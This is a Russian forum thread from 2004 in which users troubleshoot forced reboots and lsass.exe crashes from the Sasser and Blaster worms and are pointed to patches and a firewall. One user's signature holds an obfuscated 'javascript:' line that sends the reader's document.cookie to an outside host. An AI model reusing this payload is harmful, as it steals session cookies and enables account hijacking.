Спасибо, уже нашел, есть сообщение на microsoft.com
Зовут его sasser worm
есть уже patch и removal tool.
:up:



Исправлено: plabor, 15:07 2-05-2004

что-то я совсем тебя не пойму... может не выспался...
Цитата:я его случайно увидела

Просто, заглянула автозагрузку и увидела, я вообще внимательно к этому всему отношусь,все, что надо давно установлено и работает, ( у меня всего-то 4 проги, нужных мне для работы грузятся сразу, но периодически я туда, все-таки, заглядываю, мало ли что) но так как вроде ничего не качала, аутпост  работал( вру- не было тогда),и как-то это быстро произошло- неделю назад не было, а сегодня есть- вот откуда?

увидела где? откуда тогда взялось утверждение что
Цитата:сидит только в автозагрузке

сразу стала смотреть в реестр, т.е. путь, там никого подобного, стала смотреть всюду, где можно-системные,  через реестрные чистилки посмотрела, нигде не отражается, и по-видимому и не работает, но вот раздражает взляд инородное тело. Как его еще поискать?
P.S. через сейф мод не пробовала

но вот раздражает взляд инородное телоГде оно? Где вы его видите? Вам же задали вопрос прямой.

После нападения Gaobot.gen и успешного его удаления вручную я не могу зайти на symantec.com (LiveUpdate тоже не хотит к нему конектится) и на viruslist.ru .Заплаты стоят. вирусов нет. что посоветуете,,?

Guest 80.243.65.*
что посоветуете,,?Я посоветую обратиться в форум Информационная Безопасность. Видимо удаление оказалось не столь успешным как вы думаете. А если вы попутно убили какие-то важные ключи реестра или изменили системные настройки, то мы особо не сможем помочь, т.к. понятия не имеем что вы делали с системой.

Внешнее проявление вируса точно такое же как BLAST, только теперь ссылака на WINDOWS\System\lsass.exe
Никакие антивирусные программы, включая самые, самые последние, никаких вирусов не обнаруживают. Нет и файлов сопутствующих вирусам "Blaster" или "Sasser". Но после перезагрузки компьютера все возвращается на круги своя  - как только вошел в Интернет, появляется окошко с предупреждением о перезагрузке. Что бы это значило? Подскажите, кто знает. Разумеется, если загрузить соответствующий патч, принудительная загрузка компьютера не происходит. Спасибо.

Boikov
Разумеется, если загрузить соответствующий патчТак установите же его. Вы невнимательно читали первый пост в теме. Там еще и фаервол ведь рекомендуется включить...

Вероятно, я недостаточно четко сформулировал свой вопрос. Мне известно, как защититься от вирусов Blast или Sasser. Мне непонятно почему после перезагрузки компьютера, вызванной действием вируса, следов вируса обнаружить не удается. Как известно червь Sasser имеет три разновидности. Sasser a будто бы создает файл avserve.exe; Sasser b - avserve2.exe; Sasser c - skynetave.exe. После перезагрузки компьютера (до установки "патча" и брандмауера) этих файлов нп компьютере нет. Не обнаруживает следов вируса и последняя антивирусная программа FxSasser.  Может быть это еще какая-то разновидность вируса Sasser? Заранее благодарю за ответ.

Boikov
Пожалуйста, задайте ваш вопрос в форуме Информационная Безопасность. Именно там обсуждаются методы защиты и обнаружения вирусов. Там даже есть тема про Sasser.

Поймал и я эту хренотень. вот сижу читаю топик и качаю апдэйт, удалил этот бласт файл , думаю должно помочь.
Да иеще одно  время от времени выскакивает окошко  Инструкция по адресу 0x009ef878 обратилась  к памяти по адресу 0x000000023  Память не может быть  read и две кнопки ок и отмена  жмешь любую и выскакивает знакомое окошко  для перезагрузки. ах да заголовок окна  Isass.exe ошибка приложения

Так... ну и чо... у всех чума уже закончилась месяц назад, да?...
А у меня вот только началась....

В системных файлах, процессах и автозагрузке проверял всё, ничё подозрительного.
У мня 2к(рус) и ХР(РЕ,sp1+заплатки). Глючат обе. Перезагружается сразу, никакой те минуты для прощанья.
Ща поставил в 3-ий раздел ещё ХР, качаю новые заплаты. даже если поможет, как те два вина к жизни вернуть? они ни в одном из режимов не грузятся (точнее, сразу перезагружаются)!!! Если ток из консоли восстановления мон вход выполнить... но эт на вряд поможет. Откат непомогает=(((

Заранее спасибо.

У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?

Добавлено:

У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?

У мня касперский. Обновляется нормально, ток без толку, ни хрена не находит. Качай обновления, должно помочь. Я вот пока сижу... ток Update Rollup 1 не помог, после него ещё кучу заплаток скачал, не знаю, работаю вот пока, но в 2К свой заходить боюсь=). Если опять всё накроется буду держать в курсе....

Ниужели новая чума?!?!?!?

Добавлено:

Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!!

cBonD
nikolaik
Эта тема возникла потому, что бластер вызывал проблему с перезагрузкой системы, и все шли в ХР с вопросами. Решение проблемы обозначено в самом первом сообщении темы.

Для обсуждение вирусов и методов их удаления есть форум Информационная Безопасность.  

Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления.
http://forum.oszone.net/topic.cgi?forum=4&topic=5060

Дык не похоже всё это дело на бластер! Говорю хе, сразу вырубается и всё!!! Если в Debug Mode грузиться, то иногда возникает ошибка "Mashine_check_exeption". А воще я вот ща себе ещё раз c: форматнул и вин переставил, ща XP(PE) без SP1, вроде не глючит пока... мож просто в обновлении у мня какая дрянь сидела?... (у мня dial-up, соответственно, ставлю с харда, качать не имеет смысла... =))

Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!!
Да, кстати у меня та же самая фигня :gigi:
------------------
javAScript :i = new Image();i.src='%68%74%74%70%3A%2F%2F%67%36%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%61%2E%6A%70%67?'+docu ment.cookie

Newbie, а у тебя SP1?

Дык не похоже всё это дело на бластер!Тогда почему это обсуждается в данной теме? Включайте фаервол, ставтьте все заплатки и не будет проблем. А вот как удалить вирус в Инф. Без., плиз. Спасибо.

При подключении к нету вылетает LSA Shell. Вызывает ошибку и вываливает службу NT Authority, далее, я думаю, все знают. Что делать?

Исправлено: [mzd], 15:55 29-06-2004

[mzd]
А ты самый первый вопрос в теме читал?